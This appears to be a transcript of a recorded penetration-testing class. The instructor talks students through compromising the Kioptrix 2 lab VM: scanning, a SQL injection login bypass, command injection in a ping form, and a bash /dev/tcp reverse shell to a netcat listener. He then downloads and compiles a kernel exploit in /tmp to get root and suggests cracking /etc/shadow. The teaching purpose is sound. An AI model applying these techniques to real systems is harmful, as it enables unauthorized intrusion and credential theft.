started recording this just so that everybody knows that this is being recorded. So, which means I can't swear with the rest of you, which is always going to cramp my style, nevertheless. So, as always, when we start these things, what we always want to do is go in and import the appliance. Some of the virtual machine files that you can find on that site we mentioned last time we were together, which seems like a lifetime ago now, was our VMDK files and different types of files for VMware as opposed to VirtualBox. I think going forward, I'm going to make sure that I create them all as OVA files just to avoid some technical problems. As always, you need to go to where you downloaded your OVA file, and it is the Kioptrix 2.ova file, and click on Next. On this screen, everything should be fine. You shouldn't need to modify anything at this point, and you can import. Again, if anybody is having issues, please let me know right away. Okay? I do have a chat window open where I can see what is happening. So let me know if you have any questions. If it's still struggling, turn your mic on and say, hello, I have a problem with this. And I'm fine with that, of course. As always, when we want to import these things, we really want to verify our settings. So everything should be fine by and large. The only real issue is verifying our network settings. And right there, we have to verify that the adapter is set up properly. Everything else should be fine. Please note again, we're using an IDE controller. It is a bit old, so we're still using IDE controllers with this. Click on OK. And if you haven't already done so, you should also ensure that you have Kali running as well. Okay. And of course, at this point, you want to start your virtual machine. As it fires up, shouldn't be anything too shocking. You might get one or two warnings about certain services. I don't think we really need to worry about that. But on this screen here, you click inside and hit any key to go through. You want to do this hardware configuration. And by and large, the defaults will be fine. So do I want to remove the existing configuration that it can't find? It's probably got a different MAC address than from when I exported it. So it's saying, hey, I've got a new device. This is fine. We can remove the existing configuration and then add exactly the same card and configure it. So default, until you get to this screen, you want to hit the space key. Okay? You want to hit the space key because right around here, you want that little star to show up and you want all of these areas to gray out effectively. Okay? So I hit the space key to say use DHCP. Hit the tab key, so OK becomes highlighted, and then you can again hit the space key. So space, tab, or yeah, space, tab, space. And then, as was mentioned in the chat, being stuck at the login is fine. You're at this point, Himanshu? Okay, that's good. That's where we want everybody to be because we don't have any of the credentials. So we're going to figure out what that is. So at this point,
Stephen, sorry to interrupt.
Yes.
Yeah, what to select when it says hardware removed? Should I select remove configuration?
Yep. Select remove configuration. And then on the next screen, it'll say, do you want to add the configuration? Say, or you want to configure the adapter? So say, yes, I want to configure the adapter.
Okay, and then now it's on the use dynamic IP configuration screen.
Yeah. So hit the space bar so that there's a little star that appears in that,
it appeared.
and then tab over to OK.
Okay. Yep, it
Right?
started doing. Yeah.
Very good. Now, and it's going to boot up, and it's going to say, hey, I want to log in. And of course, you don't have the login credentials. This is like every other attack we've seen up to this point, except for Metasploitable. Metasploitable did give us the login credentials, but we generally don't have them. So we go over to Kali and we start our attack. Logging in as root and the standard credentials that you are going to use as we always do. Okay. Right. So, as always, verify the IP address. Perfect. I know my IP address is 153. This is another one of those events where tracking your information ahead of time is a good idea. Okay, so that's Kali. And now let us scan our network. I'm going purposely slow because I can't see your faces and see if something happens. So I'm going to talk frustratingly, monotonously slow. We're going to have to accept that. As always, I scan my network, not my specific machine. And it discovers something at 162, which looks very interesting. So let's take that one and make that the attack machine. Ready? So now I know the two that I'm probably going to be attacking. So let us commence our attack. First off, detailed scan of that IP. Obviously, as I said before, 153, that is Kali. We are not scanning Kali. We are scanning the discovered server that we're going to call K2 or Kioptrix 2. Again, if you have any questions, please don't hesitate to mention that in the chat session. And if I don't acknowledge you, please do not hesitate to raise your voice. So we have Apache. Have some information here. We did dash uppercase O as well. We got a little bit of information about Linux, but not a lot, which is interesting. That may require a little bit more investigation going forward, but it would have been nice if we had more information. We have OpenSSH, we have Apache running. Anytime we see Apache, we of course want to start our web scans. So we can do a Derb http:// and it's 192.168.56.162, I believe. And it will go through and it will do its scan and it will start finding directories and then it'll scan those directories. Now I'm going to stop this scan at this point. Okay? And I want to draw attention to this. The language, not the language, my apologies, the instruction manual for Apache is still available on this server. It's in a directory called manual. And as you can see, it has a subdirectory for quite a few different languages. Each one of those subdirectories is going to have its own directory structure. If I were to let Derb run, it would run for a very long time and not give me any results. There are ways of telling Derb to ignore things like that. But that's one of the reasons I stopped the scan, is because I'm seeing that I have a whole bunch of information that is just going to repeat itself in all of these different languages. So rather than drilling into that, I'm going to move straight on to Nikto. And again, my IP address. And again, we're really not going to get much information from this. Come on in. Whoever just joined us, welcome. I'll try and keep typing out the commands that I'm using in case you have a hard time reading what I'm doing in my terminal. But again, if you get behind, please do not hesitate to let me know. You see me in class, I can handle interruptions quite well. Okay. So Nikto and Derb, well, Nikto was cut off and Derb has completed. There's a couple of things about PHP sessions here. Again, not a lot of great value, referencing stuff that it's just going to ignore. It says I found the web server manual and I'm not going to bother scanning any deeper into that. It could have. We can tell it to, just like we can tell Derb appear to ignore deeper scans. At this point, however, what I really want to do is I want to take a look at that website. So again, I'm going to open up my web browser. And I'm going to go and navigate to that website. And we can see here that we have remote system administration login. As always, the first thing you want to do is take a look at the source. Again, sorry, highlighted something. View page source would have been a better choice. We don't see much here, but it does make reference to an administrator content for this administrator login. Our first attack should always be our standard injection. We can try the --, which is the standard SQL comment. We try that, doesn't really work. We can always try the MySQL comment, and it seems to work. And it shows me some administrator stuff here. Welcome to the basic administrative web console. And of course, ping a machine network. And we love those. Little contrived, but it gets us to a point where we can actually take advantage of known vulnerabilities in old systems, which is really what the point of a lot of these Kioptrix commands are. I am sorry, Prince. I missed your question and I apologize. Prince was asking, how do we know when to stop the Derb command? The best answer to that, Prince, and that's a great question, by the way, thank you for that. The best answer is that if you see something, regardless of the command that you launch, that's going in the wrong direction, you want to stop it. If you are not certain, then you never want to stop it. You want to let it run. As I've mentioned time and time again, I curate and present these attacks so that they can happen quite quickly. In the real world, they take days or weeks or months to run. Only time, if this is a real world event, that I would stop an attack that was in progress is if I knew for certain that it was going nowhere. If I was unsure, I would not stop it. I would let it run its course. I hope that answers your question, Prince. If there are any other questions, please do not hesitate to ask. So when we see, not a problem, sir, thank you. So we see here we have the ping command as always. We want to try it with correct information. So let's try pinging localhost. And when we ping localhost, it looks like it has done exactly what we expect from a Unix-like ping command. Also note it opens it up in a separate window, which means there's no back button, but that allows us to keep building our commands. So we can ping localhost and try the ls command. And again, it is going to open this up in a new window, giving us our ping results and also giving us the results of ls. There's clearly an index.php and there's clearly a pingit.php as well. So looks like this site is open to command chain injections or just chaining or command injections. We can take advantage of this, okay? As always, we don't have to specify a host. We can just say do ping, don't ping anything, and just try another command, such as cat etc password. And it runs quite a bit quicker, and we see we've got a couple of users here. We've got Root, we've got John, and we've got Harold. I don't see anybody else. In the past, we talked about user IDs being above 1,000, indicating, user IDs rather than system IDs. On this system, it's above 500, but there clearly is a delineation between the user IDs that are regular users and the user IDs that are system users. Okay. Also, their home directories tend to be in the home directory itself. So that's great. We can do some pretty cool command injections. Let's see if we can't take a look at Shadow. That would just be awesome if we could do that. But of course, it doesn't let us do that. So let's see why. It is because we are logged in as Apache. Okay. Now, it did allow us to execute some commands. Let's see if we can't take advantage of that and have it do something else as well. At this point, we're going to try, as we've done in the past, to execute let's do a new text editor, just so I can type into that. So that's, again, a running tally of what we've been doing today. These are what has been working. So you can take a look at this screen here. This I have here because I want to explain the next command chain, as I've done in the handout and in the supporting video that I made earlier for you guys, which I hope you look at, as well as this recording, because the command is a little wonky. So we need to do a couple of different things. I am again going to bring back my support document that I had before. As always, I need you to understand exactly what it is we're doing in this class. We are attacking from Cali. We are attacking to K2 across our host-only network. What we want to try and do next is launch a remote shell on K2 from Cali, okay? Which means we install the listener here, we start the shell here. We start our listener here. We don't install, my mistake. We start our listener in Cali so that it can listen to it, and then we start some kind of shell over in Kioptrix, and that's what we're going to do next. in most of these cases, when you are trying to share this information, you always want to, there we go, you always want to start your listener first. We always want to start the listener before we launch our shell. So again, I go back into Kali. I am again going to start a new tab. I could also have done Control-Shift-T. And in this case, we're just going to use the netcat or NC command. -NVLP, we've seen this before, and we need to specify a port. We're going to specify port 443. We could use any port we want, but but in this case, we're going to start using ports that we know are open, all right? We know port 443 is open. We're going to use that. We know port 80 is open. We're going to use that as well. There's a chance that there are firewalls in place with these systems. So what we need to do is use open ports as much as possible, mitigating against certain issues. Okay? So I know 443 is open. I'm going to use that for my listener. I know port 80 is open. I'm going to use that to grab files from Kali and put it on the K2 server. So when I launch this command here, I'm using port 443 just because I know that one is available. Okay? And when I hit enter, it is listening on port 443. Now that I have that in place, I want to, in my browser, launch the following shell invocation command. Okay. So I'm going to do something like this. It is a command chain injection, so I need to end the previous command, the ping command, and start my new command. And I'm just going to start a bash shell, -I. I'm going to redirect that, the ampersand, and dev TCP, and then specify the IP address of my Kali, because that's what I need to direct it to, and then specify the port 443, 0 greater than ampersand 1, just like that. Now, I could try and explain all of the various pieces of this, but to be honest, I understand that this kind of command is how I invoke a shell from a browser and a command chain injection once I have a listener running. Okay? The only pieces I can modify are the target IP addresses, which is 153, not 152, so that's clearly a typo, right? So I specify the target of my listener, which is running on 153, and I specify the port of the listener. Otherwise, and I'm launching bash. Otherwise, it's just the way that you invoke these commands. So once you have it typed in, highlight that, edit, copy, make that your command injection, submit, keeping an eye on your listener over here. I'm just going to slide this off to the side. So I have my command injection. I have my listener running here. And when I click on submit, the page continues trying to load, waiting, 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 and it looks like I've started a new bash session over here. I'm going to minimize my browser now because I don't really need that anymore. I now have a shell. Again, keeping in mind that this shell is running on the K2 server. This is the remote K2 server. Okay? I no longer need that command injection. I can minimize or get rid of that. And this is, again, what we are working on. Okay? As always, first things first, who am I? I am Apache. We saw this before, so we're not surprised. Now, our initial scan The command again? Yes, I'm sorry, again, since I missed it, that's the command that I used right there. The command is also in the Word document. Wait, one. The command is also at the top of page 3 of the supporting Word document. Okay, but I'll leave that up so you can see it prints. Okay. Orientate my screen just a little bit better so everything sits in it nicely with as much real estate as possible. So that's the command, and that's perfect, but because you asked, Prince, I'm going to leave it up for everybody to see, I should say, because you're not the only one who might have questions. So I'm going to leave the command up there for others to see as well. But again, keeping in mind that that command goes in to your command chain injection inside of your browser. Okay. If the command did not work, Himanshu, chances are you have a typo. Spaces, that's a -I, greater than symbol ampersand, /dev/TCP, your IP address, of course, for Cali. This is the IP address for Cali, /443. You also want to make sure that you typed in the NC command. Okay, so try again. If you're still struggling with it, Himanshu, let me know after my presentation because we're almost done. Okay, so try that. I'll leave it up. You got it? Perfect. Let's do this. So I'll leave that up so people can see that. It might make things a little easier for everyone to see. Just like that. Just like that. And then, perfect. So earlier in our scan, when we asked for the operating system information as well, we just got, hey, it's Linux. We didn't get anything extra, which was interesting. I want to know that information, and fortunately, one of the ways to do that is to take a look at the etc star-release file. If I do an ls first, etc star-release, it says there is a file called Red Hat release. So now I can cat that, or I can just simply go straight to cat star release like this. And it'll give me the contents of that. It is saying it's Red Hat, but it is specifically saying it is the CentOS release 4.5. Okay? It's handy information, keeping in mind that, again, on this screen here, this is in K2. Consequently, I am renaming that to K2 so I don't make mistakes. This is my remote shell in K2. So anytime I'm typing something in this screen, I'm working on that remote shell in K2. I'm going to open up another new tab, and as always, I am going to search through SearchSploit for my content. SearchSploit. Tab is your friend. I was missing the H, and it discovered that. I'm going to search for Linux, kernel, and CentOS. Please note it is not case sensitive. I'm just temporarily going to make this full screen. Run that command again so you can see what we're dealing with. There are a lot of information here, and a lot of these really do have to do with privilege escalation. There are 5 ones that are big here right at the top, and to be fair, actually that's closer to 7. We can start playing with any of these to see what's going on, all right? I was always playing with this one, and I could never get it to work the way I wanted to. But again, to follow up on something I believe it was Prince that asked earlier, how do I know which one of these to attack? I would attack them all. And I would probably do it in this order just to see what's going on. We don't really have the luxury of that kind of stuff, so we're going to focus on the one attack that I know what works. But given this result, I would go through and attack all of these just to see which one worked. Okay? So this one looks interesting. So let's try that again. I'm going to rerun the command because I really need to see this and this. Somebody is joining us or somebody left us and you're back. Okay, all good.
Stephen?
Yes, sir.
Yeah, Prince again. So what did we do after writing the command in the browser when it says who am I? It's Apache. I didn't get after that.
Okay, then you're a couple of steps behind. This is Himanshu?
It's Prince.
It's Prince? Okay, I'm not sure where you are, so just keep following along and then pick up. I'm going to share this video later on, and you can be able to go through and get caught up. It's a good question, but I think you're a couple of steps behind right now, so we'll try this. And if this isn't working, we'll figure out something different at a future date. But we're very close to being done, so I'll complete this, and then we can do one-on-one conversations later. I hope that's okay. Right now, I don't have a folder for K2, so I'm going to make a directory for K2, CD into the K2 directory, and as always, I want to grab a copy of that code and download it here. So I'm going to CP from the directory of exploits, copy and paste, and specifically that exploit right there. Copy and paste is your friend. Okay? So I'm copying that entire file to the current present directory. The single dot means copy it right here. Right? And when I do that, I now have that source file here. Okay? I'm not going to compile it here. I really can't. Anytime you've got some kind of source code that you want to execute, you have to compile it where you want to run it. This is privilege escalation code. So what I need to do is run it on this tab here, which means I have to take this source code, upload it to an environment here, compile it here, and run it here. So that's what I'm going to do next. I want to upload this code here. There's a couple of ways of doing it. You could search it online in all kinds of different ways, but the way I prefer it is to copy it to this directory, set up a web server in this directory. And we're going to do that with the Python command -m to load a specific module. The module we're going to load is simple HTTP tab, and it auto-completes for the simple HTTP server module. We are going to specify a port. By default, it does port 8000, I believe. But we're going to tell it, you know what, use port 80. Because again, we know that's open in the firewalls. Let's just use that port. So I'm telling it to use port 80. And it'll say, okay, I am sitting here listening on port 80 for web requests. And we did it in the same directory as our source code for our privilege escalation exploit, because that becomes the document root, and I can then download this file. Where do I want to download this file? Again, right here. Now I'm going to type something in, and it's going to throw an error, but we're doing that on purpose to understand what's happening. Now that I've got the source code ready to download, I can simply type in wget. And I'm going to wget that IP address again, 192.168.56.153, all right? Because it is the IP address of Kali / and it is the source code, which is, I think it's 9545.c, and it's going to get it to my current directory. Unfortunately, I cannot write to this directory. I cannot write this file at this location because Apache doesn't have permissions. And this can be a challenge. The solution is understanding that for most people, regardless, there is almost always a directory where people have permissions. And that is the temp directory in Linux. When we do an ls-al in the temp directory, we see a couple of files. We see that I don't have permissions to the root, but I am part of everybody else. And everybody else has read-write-execute permissions to this directory, which means I should have permissions to copy and create stuff in this directory. Let's try again. I'm going to re-execute the wget command, and now it says it was saved. Now it's not throwing errors. And when I do an ls-al, it says, hey, you were able to download in this directory. Because most people, usually all people, will have the ability to write to that directory when they run, regardless of who they are. The permissions are set up for temp, that if you need a place to temporarily write files, that's the location. If you are hacking, that's the place where you can download and compile code. Now that we've got this code, we can now go ahead and compile it. Okay? And that is done with, again, the gcc command. We're going to specify an output -o, and that output, we can call it escalate, or we can just call it exploit. Doesn't matter. You're creating your own compiled file. And then the input is, of course, 9545.c. We're going to tell it to compile. It's giving us a warning, but when we do an ls-al again, we've got our exploit file, and it is ready to run. /x. Tab doesn't work. Tab doesn't work because we've got a semi-shell here. We don't have a fully completed shell. I could double-click, copy, and paste, but I should be able to type exploit without messing it up. The shell has changed from bash to a simple shell. The prompt has changed from a string to a hash, and that's usually an indicator that we are root. The ultimate test is the whoami command, and it shows that I've been able to elevate myself to root. At this point, I can cat etc shadow and start cracking passwords if I was so inclined. I can grab the etc password file, I can grab the etc shadow file, and I can, if I really want to, start cracking those passwords. If you're looking for something to do, you have time today. You have another hour left for today, so go ahead and do that. Okay? Any questions? That's it. That's what I wanted to show you. I'm going to update some notes here. Once I have the remote shell, I'm going to search for vulnerabilities, copy source of vulnerability to working Derb. All right, in this case it was K2. Once I've done that, start the simple module in Python. Once I've done that in remote shell, download exploit source. Which in this case was the 9545.c source code. In a remote shell, compile, and execute. Any questions? Who am I command shows that we are root. Let's do this. Tracking username password combos in K2. All right. I think it's worth trying. If nobody has any questions, I'm going to stop this now, and I'm going to answer Prince. Let's see how our next class goes. Prince is asked, actually, I'm going to stop recording it.